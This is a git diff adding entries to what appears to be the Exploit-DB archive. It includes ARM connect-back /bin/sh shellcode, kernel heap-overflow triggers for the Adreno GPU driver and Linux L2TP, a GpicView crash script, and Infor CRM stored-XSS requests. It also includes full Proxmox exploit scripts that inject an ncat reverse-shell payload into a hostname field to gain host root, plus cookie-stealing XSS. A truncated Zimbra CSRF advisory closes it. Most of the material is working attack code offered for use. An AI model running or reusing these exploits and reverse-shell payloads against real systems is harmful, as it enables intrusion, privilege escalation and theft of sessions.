diff --git a/files.csv b/files.csv index 1532ba4bd..9cfafac72 100755 --- a/files.csv +++ b/files.csv @@ -35698,6 +35698,7 @@ id,file,description,date,author,platform,type,port 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 +39458,platforms/php/webapps/39458.txt,"OCS Inventory NG <= 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 39461,platforms/multiple/dos/39461.txt,"Adobe Flash -TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0 @@ -35733,3 +35734,14 @@ id,file,description,date,author,platform,type,port 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino <= R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 +39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to {ip:port} with /bin/sh - 95 bytes",2016-02-26,Xeon,arm,shellcode,0 +39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 +39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection Vulnerability",2016-02-26,"xevil and Blankon33",php,webapps,80 +39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0 +39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - CSRF Vulnerability",2016-02-26,Sysdream,linux,webapps,443 +39501,platforms/php/webapps/39501.txt,"Centreon <= 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0 +39502,platforms/linux/dos/39502.py,"GpicView 0.2.5 - Crash PoC",2016-02-26,"David Silveiro",linux,dos,0 +39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0 +39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 +39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 +39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 diff --git a/platforms/android/dos/39504.c b/platforms/android/dos/39504.c new file mode 100755 index 000000000..a63beb3b2 --- /dev/null +++ b/platforms/android/dos/39504.c @@ -0,0 +1,91 @@ +/* +Source: https://code.google.com/p/google-security-research/issues/detail?id=734 + +The Adreno GPU driver for the MSM Linux kernel contains a heap +overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug +results from an incorrect conversion to a signed type when calculating +the minimum count value for the query option. This results in a +negative integer being used to calculate the size of a buffer, which +can result in an integer overflow and a small sized allocation on +32-bit systems: + +int adreno_perfcounter_query_group(struct adreno_device *adreno_dev, + unsigned int groupid, unsigned int __user *countables, + unsigned int count, unsigned int *max_counters) +{ +... + if (countables == NULL || count == 0) { + kgsl_mutex_unlock(&device->mutex, &device->mutex_owner); + return 0; + } + + t = min_t(int, group->reg_count, count); + + buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL); + if (buf == NULL) { + kgsl_mutex_unlock(&device->mutex, &device->mutex_owner); + return -ENOMEM; + } + + for (i = 0; i < t; i++) + buf[i] = group->regs[i].countable; + +Note that the "count" parameter is fully controlled. Setting count = +0x80000001 will result in min_t returning 0x80000001 for "t", and +kmalloc allocating a buffer of size 0x4. The loop will then overflow +"buf" because "t" is unsigned, i.e. a large positive value. + +The bug was added in the following commit: + +https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c + +A proof-of-concept that triggers this issue (adreno_perfcnt_query.c) +is attached. On Android devices /dev/kgsl-3d0 is typically accessible +in an untrusted app domain, so if exploited this issue could be used +for local privilege escalation. + +*/ + +#include +#include +#include +#include +#include +#include +#include + +struct kgsl_perfcounter_query { + unsigned int groupid; + unsigned int *countables; + unsigned int count; + unsigned int max_counters; + unsigned int __pad[2]; +}; + +#define KGSL_IOC_TYPE 0x09 +#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query) + +int main(void) { + int fd; + struct kgsl_perfcounter_query data; + unsigned int countables[16]; + + fd = open("/dev/kgsl-3d0", O_RDWR); + + if (fd == -1) { + perror("open"); + return -1; + } + + memset(&data, 0, sizeof(struct kgsl_perfcounter_query)); + + data.groupid = 1; + data.countables = (unsigned int *) &countables; + data.count = 0x80000001; + + ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data); + + close(fd); + + return 0; +} diff --git a/platforms/arm/shellcode/39496.c b/platforms/arm/shellcode/39496.c new file mode 100755 index 000000000..63b92944b --- /dev/null +++ b/platforms/arm/shellcode/39496.c @@ -0,0 +1,37 @@ +/* + Title : Linux/ARM - Connect back to {ip:port} with /bin/sh + Length : 95 bytes + Date : 2014-06-03 + Author : Xeon + Tested : ARM1176 rev6 (v6l) +*/ + +#include +#include + + char *shellcode = "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x92\x1a\x90\x1a\x17\x27\x01\xdf" + "\x02\x20\x41\x1e\x82\x1e\x07\x02\xe7\x3f\x01\xdf\x05\x1c\x01\xac" + "\x02\x21\x21\x60\x02\x34\x05\x21\x21\x70\x01\x34\x39\x21\x21\x70" + "\x0a\x21\x02\x91\x04\x34\x21\x70\x01\xa9\x10\x22\x02\x37\x01\xdf" + "\xdc\x3f\x02\x21\x28\x1c\x01\xdf\x01\x39\xfb\xd5\x49\x1a\x92\x1a" + "\x0b\x27\x01\xa0\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x73\x68"; /* 10.0.0.10:1337 */ + +int main() +{ +__asm__ ( "eor r0, r0\n\t" + "sub r0, #1\n\t" + "mov r1, r0\n\t" + "mov r2, r0\n\t" + "mov r3, r0\n\t" + "mov r4, r0\n\t" + "mov r5, r0\n\t" + "mov r6, r0\n\t" + "mov r7, r0\n\t"); + + printf("Shellcode length: %d\n", strlen(shellcode)); + printf("Running shellcode...\n"); + (*(void(*)()) shellcode)(); + printf("Failed!\n"); + return 0; +} + diff --git a/platforms/ashx/webapps/39497.txt b/platforms/ashx/webapps/39497.txt new file mode 100755 index 000000000..0113f15d4 --- /dev/null +++ b/platforms/ashx/webapps/39497.txt @@ -0,0 +1,175 @@ + +Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities + + +Vendor: Infor +Product web page: http://www.infor.com +Affected version: 8.2.0.1136 + + +Summary: Infor® CRM, formerly Saleslogix, is an award-winning +customer relationship management (CRM) solution that provides +a complete view of customer interactions, so your business can +collaborate and respond promptly and knowledgably to customer +inquiries, sales opportunities, and service requests. Infor CRM +includes a robust suite of sales, marketing, and service capabilities, +to offer businesses of all sizes a fast, flexible, and affordable +solution for finding, winning, and growing profitable customer +relationships. + +Desc: Infor CRM suffers from multiple stored cross-site scripting +vulnerabilities. Input passed to several POST/PUT parameters in +JSON format is not properly sanitised before being returned to the +user. This can be exploited to execute arbitrary HTML and script +code in a user's browser session in context of an affected site. + +Tested on: Microsoft-IIS/8.5 + ASP.NET/4.0.30319 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5308 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php + + +21.01.2016 + +--- + + +---------------------------------- +Affected parameter(s): description +---------------------------------- + +PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1 +Host: intranet.zeroscience.mk + + +{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…} +"": "" +$descriptor: "" +$etag: "+CgjMLB+0nA=" +$httpStatus: 200 +$key: "eUSERA0004IX" +$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" +$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" +$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json" +$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json" +$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json" +$updated: "/Date(1456359095000)/" +$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')" +accountId: null +activityId: null +attachDate: "2016-01-25T00:09:39Z" +contactId: null +contractId: null +createDate: "/Date(1456359095000)/" +createUser: "UUSERA0005W0" +dataType: "R" +defectId: null +description: "" +details: {createSource: null} +documentType: null +fileExists: true +fileName: "inforcrm_xss.png" +fileSize: 101722 +historyId: null +leadId: null +modifyDate: "/Date(1456359095000)/" +modifyUser: "UUSERA0005W0" +opportunityId: null +physicalFileName: "!eUSERA0004IXinforcrm_xss.png" +productId: null +remoteStatus: null +returnId: null +salesOrderId: null +ticketId: null +url: null +user: {$key: "UUSERA0005W0"} + + + +----------------------------------------------------------- +Affected parameter(s): Description, Location, and LongNotes +----------------------------------------------------------- + +POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1 +Host: intranet.zeroscience.mk + + +{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…} +$descriptor: "" +$httpStatus: 200 +AccountId: null +AccountName: null +ActivityAttendees: {} +ActivityBasedOn: null +Alarm: false +AlarmTime: "2016-01-24T22:45:00Z" +AllowAdd: true +AllowComplete: true +AllowDelete: true +AllowEdit: true +AllowSync: true +AppId: null +Attachment: false +AttachmentCount: null +AttendeeCount: 0 +Category: "Pleasantville" +ContactId: null +ContactName: null +CreateDate: "/Date(-62135596800000)/" +CreateUser: null +Description: "" +Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…} +ChangeKey: null +CreateSource: null +ForeignId1: null +ForeignId2: null +ForeignId3: null +ForeignId4: null +GlobalSyncId: null +ProjectId: null +Tick: null +UserDef1: null +UserDef2: null +UserDef3: null +Duration: "0" +EndDate: "/Date(1456359315286)/" +LeadId: null +LeadName: null +Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"} +$descriptor: "Userovich, User" +$key: "UUSERA0005W0" +Location: "" +LongNotes: "" +ModifyDate: "/Date(-62135596800000)/" +ModifyUser: null +Notes: "Zero Science Lab" +OpportunityId: null +OpportunityName: null +OriginalDate: "/Date(1456358415286)/" +PhoneNumber: null +Priority: "1" +ProcessId: null +ProcessNode: null +RecurIterations: 0 +RecurPeriod: 0 +RecurPeriodSpec: 0 +RecurSkip: null +RecurrenceState: "rsNotRecurring" +Recurring: false +Resources: {} +Rollover: false +StartDate: "2016-01-25T00:00:05Z" +TicketId: null +TicketNumber: null +Timeless: true +Type: "atToDo" +UserActivities: {} +$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" +UserNotifications: {} +$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" diff --git a/platforms/linux/dos/39502.py b/platforms/linux/dos/39502.py new file mode 100755 index 000000000..01f7784db --- /dev/null +++ b/platforms/linux/dos/39502.py @@ -0,0 +1,48 @@ +#!/usr/bin/python +# Exploit Title: GpicView Buffer Overflow DOS +# Date: 25th February 2016 +# Exploit Author: David Silveiro (Xino.co.uk) +# Vendor Homepage: lxde.sourceforge.net/gpicview/ +# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/ +# Version: 0.2.5 +# Tested on: Ubuntu 14 LTS +# CVE : 0 day + +#Example: python POC.py [image-file] + +from sys import argv +from subprocess import Popen +from shlex import split +from time import sleep +import shutil + +def DOS(arg): + #"""------------------------------------"""# + command = 'gpicview ' + arg[1] #''' Recieve file & construct Popen '''# + command_2 = split(command) #"""------------------------------------"""# + #"|" "|"# + Popen(command_2) #""" Open file with Gpicview """# + #"""------------------------------------"""# + print("Required: You have 15 seconds") + print("to click on preferences, and ") + print("check 'Auto Save Images' ") + + sleep(15) + #"""------------------------------------"""# + buffer = 'A' * 70 + '.png' #"|" Rename image with Buffer "|"# + shutil.move(arg[1], buffer) #"""------------------------------------"""# + +def main(): + + print("Author: David Silveiro ") + print("Company: Xino.co.uk ") + print(" POC Gpicview DOS ") + + DOS(argv) + + print("File ready for overflow ") + print("Now simply rotate the image") + + +if __name__ == "__main__": + main() diff --git a/platforms/linux/dos/39505.c b/platforms/linux/dos/39505.c new file mode 100755 index 000000000..c42213520 --- /dev/null +++ b/platforms/linux/dos/39505.c @@ -0,0 +1,97 @@ +/* +Source: https://code.google.com/p/google-security-research/issues/detail?id=735 + +In certain kernel versions it is possible to use the AIO subsystem (io_submit syscall) to pass size values larger than MAX_RW_COUNT to the networking subsystem's sendmsg implementation. In the L2TP PPP sendmsg implementation, a large size parameter can lead to an integer overflow and kernel heap corruption during socket buffer allocation. This could be exploited to allow local privilege escalation from an unprivileged user account. + +This issue affects 64-bit systems running older branches of the Linux kernel, such as version 3.10 and 3.18. More recent major versions aren't affected due to refactoring in the AIO subsystem. The attached proof-of-concept trigger has been tested on a fully updated Ubuntu 14.04 LTS server. This issue is also likely to affect 64-bit Android devices, which typically use branches of 3.10. + +The first observation is that an IOCB_CMD_PWRITE of a large length (such as 0xffffffff) will correctly bound the request iocb's ki_nbytes value to MAX_RW_COUNT. However, in the single vector case, if the relevant access_ok check passes in aio_setup_single_vector then the iov length will still be large (0xffffffff). On 64-bit systems it is possible for access_ok(type, user_ptr, 0xffffffff) to succeed. + +The second observation is that sock_aio_write does not use the iocb for the sendmsg size calculation, but instead takes the summation of all input iov lengths. Thus calling io_submit with an IOCB_CMD_PWRITE operation on a socket will result in a potentially large value being passed to sendmsg. + +The third observation is that AF_PPPOX sockets using the PX_PROTO_OL2TP protocol has a sendmsg implementation that does not bounds check the incoming length parameter (called total_len) before using the value to calculate the length of a socket buffer allocation (using sock_wmalloc). + +The fourth observation is that the underlying socket buffer allocation routine __alloc_skb uses an "unsigned int" for it's size parameter rather than a size_t, and that this value can wrap to a small positive value upon alignment calculations and internal space overhead calculations. This results in a small value being passed to kmalloc for the socket buffer data allocation. Then, the size is recalculated using SKB_WITH_OVERHEAD, which effectively re-underflows the size calculation to a small negative value (large unsigned value). The newly created socket buffer has a small backing data buffer and a large size. + +The proof-of-concept trigger crashes when writing the skb_shared_info structure into the end of the socket buffer, which is out-of-bounds. Other corruption may also be possible in pppol2tp_sendmsg/l2tp_xmit_skb/ip_output. + +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char *argv[]) { + struct sockaddr_pppol2tp sax; + struct sockaddr_in addr; + int s, sfd, ret; + struct iocb *iocbp; + struct iocb iocb; + aio_context_t ctx_id = 0; + void *data; + + s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); + + if (s == -1) { + perror("socket"); + return -1; + } + + memset(&sax, 0, sizeof(struct sockaddr_pppol2tp)); + + sax.sa_family = AF_PPPOX; + sax.sa_protocol = PX_PROTO_OL2TP; + + sax.pppol2tp.fd = -1; + sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr; + sax.pppol2tp.addr.sin_port = addr.sin_port; + sax.pppol2tp.addr.sin_family = AF_INET; + sax.pppol2tp.s_tunnel = -1; + sax.pppol2tp.s_session = 0; + sax.pppol2tp.d_tunnel = -1; + sax.pppol2tp.d_session = 0; + + sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax)); + + if (sfd == -1) { + perror("connect"); + return -1; + } + + data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + if (data == MAP_FAILED) { + perror("mmap"); + return -1; + } + + memset(data, 0x41, 0x100001000); + + ret = syscall(__NR_io_setup, 2, &ctx_id); + + if (ret == -1) { + perror("io_setup"); + return -1; + } + + memset(&iocb, 0, sizeof(struct iocb)); + + iocb.aio_fildes = s; + iocb.aio_lio_opcode = IOCB_CMD_PWRITE; + iocb.aio_nbytes = 0xfffffe60; + iocb.aio_buf = (unsigned long) &data; + + iocbp = &iocb; + + syscall(__NR_io_submit, ctx_id, 1, &iocbp); + + return 0; +} diff --git a/platforms/linux/remote/39499.txt b/platforms/linux/remote/39499.txt new file mode 100755 index 000000000..fb8e73cc3 --- /dev/null +++ b/platforms/linux/remote/39499.txt @@ -0,0 +1,465 @@ +===================================================================== +Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS, +Privileges escalation) +===================================================================== + +Description +=========== + +Proxmox is a popular virtualization solution based on KVM and Linux +containers. + +A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and +Proxmox VE 4 beta 1 (LXC) in the +virtual machine creating form allowing authenticated remote users to +overwrite configuration files settings. + + +Configuration file overwriting +============================== + +Because the Proxmox VE application doesn't check the +user-provided "hostname" POST parameter, it's +possible to overwrite configuration files using a CRLF injection. +In Proxmox VE 3, we successfully gained access to the host filesystem +from a container and elevated our container capabilities, allowing us to +obtain user credentials and sniff the network. +In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we +successfully gained root privileges on the host. +It's also possible to exploit Proxmox clusters. + +**Access Vector**: remote + +**Security Risk**: high + +**Vulnerability**: CWE-915 + +Proof of Concept +---------------- + +The following exploit works for Proxmox VE 4 beta 1. The +lxc.hook.pre-start configuration variable is used to trigger the ncat +reverse-shell payload when the container is started. + + #!/usr/bin/env python + + import requests + import socket + import telnetlib + from threading import Thread + import argparse + from time import sleep + + def exploit(target, username, password, vmid, template, realm, +reverse, hostname): + payload = "ncat %s %s -e /bin/sh" % reverse + + print "[~] Obtaining authorization key..." + apireq = requests.post("https://%s/api2/extjs/access/ticket" % +target, + verify=False, + data={"username": username, + "password": password, + "realm": realm}) + response = apireq.json() + if "success" in response and response["success"]: + print "[+] Authentication success." + ticket = response["data"]["ticket"] + csrfticket = response["data"]["CSRFPreventionToken"] + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname), + verify=False, + headers={"CSRFPreventionToken": +csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + +"hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpulimit": 1, + "cpuunits": 1024, + "net0":"name=eth0"}) + if createvm.status_code == 200: + response = createvm.json() + if "success" in response and response["success"]: + print "[+] Container Created... (Sleeping 20 seconds)" + sleep(20) + print "[+] Starting container..." + startcontainer = +requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" % +(target, hostname, vmid), verify=False, headers={"CSRFPreventionToken": +csrfticket}, cookies={"PVEAuthCookie": ticket}) + if startcontainer.status_code == 200: + response = startcontainer.json() + if "success" in response and response["success"]: + print "[+] Exploit should be working..." + else: + print "[!] Can't start container ! Try to +start it manually." + else: + print "[!] Error creating container..." + print response + else: + print "[!] Error creating Container. Bad HTTP Status +code : %d" % createvm.status_code + else: + print "[!] Authentication failed - Check the credentials..." + + def handler(lport): + print "[~] Starting handler on port %d" % lport + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lport)) + s.listen(1) + conn, addr = s.accept() + + print "[+] Connection from %s" % addr[0] + + t.sock = conn + + print "[+] Pop the shell ! :)" + + t.interact() + + if __name__ == "__main__": + print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas +Chatelain \n" + + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True, help="The target +host (eg : 10.0.0.1:8006)") + + parser.add_argument("--username", required=True) + parser.add_argument("--password", required=True) + + parser.add_argument("--localhost", required=True, help="Local +host IP for the connect-back shell.") + parser.add_argument("--localport", required=True, type=int, +help="Local port for local bind handler") + + parser.add_argument("--vmid", required=False, default="999", +type=int, help="A unique ID for the container, exploit will fail if the +ID already exists.") + + parser.add_argument("--template", required=False, +default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", + help="An existing template in the hypervisor " + "(default : +local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") + + parser.add_argument("--realm", required=False, default="pam", +choices=["pve", "pam"]) + + parser.add_argument("--hostname", required=True, help="The +target hostname") + + args = parser.parse_args() + + handlerthr = Thread(target=handler, args=(args.localport,)) + handlerthr.start() + + exploitthr = Thread(target=exploit, args=(args.target, +args.username, args.password, args.vmid, args.template, args.realm, +(args.localhost, args.localport), args.hostname)) + exploitthr.start() + + handlerthr.join() + +Shell output : + + nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python +remoteroot.py --target 10.25.0.101:8006 --username nicolas --password +pveuser --localhost 10.25.0.10 --localport 9999 --vmid 456 --realm pve +--hostname pve4 + [~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain + + [~] Starting handler on port 9999 + [~] Obtaining authorization key... + [+] Authentication success. + [+] Container Created... (Sleeping 20 seconds) + [+] Exploit should be working... + [+] Connection from 10.25.0.101 + [+] Pop the shell ! + whoami + root + id + uid=0(root) gid=0(root) groups=0(root) + +The following exploit works for Proxmox VE 3. This proof of concept +mount the host /dev/dm-0 on the container and add multiples capabilities +on the container. + + + #!/usr/bin/env python + + import requests + import socket + import telnetlib + from threading import Thread + import argparse + + def exploit(target, username, password, vmid, template, realm, +hostname): + payload = "sysdream\"\nDEVNODES=\"dm-0:r +\"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on, +dac_override:on\"\n#" + print "[~] Obtaining authorization key..." + apireq = requests.post("https://%s/api2/extjs/access/ticket" % +target, + verify=False, + data={"username": username, + "password": password, + "realm": realm}) + response = apireq.json() + if "success" in response and response["success"]: + print "[+] Authentication success." + ticket = response["data"]["ticket"] + csrfticket = response["data"]["CSRFPreventionToken"] + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname), + verify=False, + headers={"CSRFPreventionToken": +csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + "hostname": payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpus": 1, + +"netif":"ifname=eth0,bridge=vmbr0"}) + if createvm.status_code == 200: + response = createvm.json() + if "success" in response and response["success"]: + print "[+] Countainer (Capabilities + DM-0 Mount) +Created." + else: + print "[!] Error creating container..." + print response + else: + print "[!] Error creating Container. Bad HTTP Status +code : %d" % createvm.status_code + else: + print "[!] Authentication failed - Check the credentials..." + + if __name__ == "__main__": + print "[~] Proxmox VE 3 Authenticated Privileges Escalation +Exploit - Nicolas Chatelain \n" + + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True, help="The target +host (eg : 10.0.0.1:8006)") + + parser.add_argument("--username", required=True) + parser.add_argument("--password", required=True) + + parser.add_argument("--vmid", required=False, default="999", +type=int, help="A unique ID for the container, exploit will fail if the +ID already exists.") + + parser.add_argument("--template", required=False, +default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", + help="An existing template in the hypervisor +(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") + + parser.add_argument("--hostname", required=True, help="The +target hostname") + + parser.add_argument("--realm", required=False, default="pam", +choices=["pve", "pam"]) + + args = parser.parse_args() + + exploit(args.target, args.username, args.password, args.vmid, +args.template, args.realm, args.hostname) + +Shell output : + + nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python +privescalation.py --username root --password sysofdream --vmid 123 +--realm pam --target 10.25.0.110:8006 --hostname pve3 + [~] Proxmox VE 3 Authenticated Privileges Escalation Exploit - +Nicolas Chatelain + + [~] Obtaining authorization key... + [+] Authentication success. + [+] Countainer (Capabilities + DM-0 Mount) Created. + +-- On container : + + root@sysdream:/# ls -lah /dev/dm-0 + brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0 + +--- +Stored Cross-Site Scripting +=========================== + +Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1. + +**Access Vector**: remote + +**Security Risk**: high + + +Proof of Concept +---------------- + +The following exploit will create a stored XSS displaying the user +cookies and the PVE CSRFPreventionToken. + + + #!/usr/bin/env python + + import requests + import socket + import telnetlib + from threading import Thread + import argparse + + def exploit(target, username, password, vmid, template, realm, +version, hostname): + payload = +"eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))" + print "[~] Obtaining authorization key..." + apireq = requests.post("https://%s/api2/extjs/access/ticket" % +target, + verify=False, + data={"username": username, + "password": password, + "realm": realm}) + response = apireq.json() + if "success" in response and response["success"]: + print "[+] Authentication success." + ticket = response["data"]["ticket"] + csrfticket = response["data"]["CSRFPreventionToken"] + if version == "4": + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname), + verify=False, + headers={"CSRFPreventionToken": +csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + +"hostname":"" % payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpulimit": 1, + "cpuunits": 1024, + "net0":"name=eth0"}) + elif version == "3": + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname), + verify=False, +headers={"CSRFPreventionToken": csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + +"hostname":"" % payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpus": 1, + +"netif":"ifname=eth0,bridge=vmbr0"}) + if createvm.status_code == 200: + response = createvm.json() + if "success" in response and response["success"]: + print "[+] Stored XSS Created." + else: + print "[!] Error creating container..." + print response + else: + print "[!] Error creating Container. Bad HTTP Status +code : %d" % createvm.status_code + else: + print "[!] Authentication failed - Check the credentials..." + + if __name__ == "__main__": + print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting - +Nicolas Chatelain \n" + + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True, help="The target +host (eg : 10.0.0.1:8006)") + + parser.add_argument("--username", required=True) + parser.add_argument("--password", required=True) + + parser.add_argument("--vmid", required=False, default="999", +type=int, help="A unique ID for the container, exploit will fail if the +ID already exists.") + + parser.add_argument("--template", required=False, +default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", + help="An existing template in the hypervisor +(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") + + parser.add_argument("--realm", required=False, default="pam", +choices=["pve", "pam"]) + + parser.add_argument("--version", default="3", choices=["3", +"4"], help="The Proxmox version to exploit") + + parser.add_argument("--hostname", required=True, help="The +target hostname") + + args = parser.parse_args() + + exploit(args.target, args.username, args.password, args.vmid, +args.template, args.realm, args.version, args.hostname) + +--------------- +Vulnerable code +--------------- + +The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for +Proxmox 4. + +For Proxmox 3, the vulnerable code is located in +/usr/share/perl5/PVE/OpenVZ.pm. + +-------- +Solution +-------- + +Proxmox 4 : Update to pve-container 0.9-22 + +Proxmox 3 : Update to pve-manager 3.4-10 + +Timeline (dd/mm/yyyy) +===================== + +04/09/2015 : Initial discovery. +17/09/2015 : Contact with proxmox team. +18/09/2015 : Proxmox fixes the vulnerabilities. +18/09/2015 : Proxmox releases a new pve-container version (0.9-22) +18/09/2015 : Proxmox releases a new pve-manager version (3.4-10) + +Affected versions +================= + +* Proxmox VE 4 +* Proxmox VE 3 + + +Credits +======= + +* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) \ No newline at end of file diff --git a/platforms/linux/webapps/39500.txt b/platforms/linux/webapps/39500.txt new file mode 100755 index 000000000..40b408a97 --- /dev/null +++ b/platforms/linux/webapps/39500.txt @@ -0,0 +1,79 @@ +====================================== +Multiple CSRF in Zimbra Mail interface +====================================== + + +CVE-2015-6541 + +Description +=========== + +Multiple CSRF vulnerabilities have been found in the Mail interface of +Zimbra 8.0.9 GA Release, enabling to change account +preferences like e-mail forwarding. + + +CSRF +==== + +Forms in the 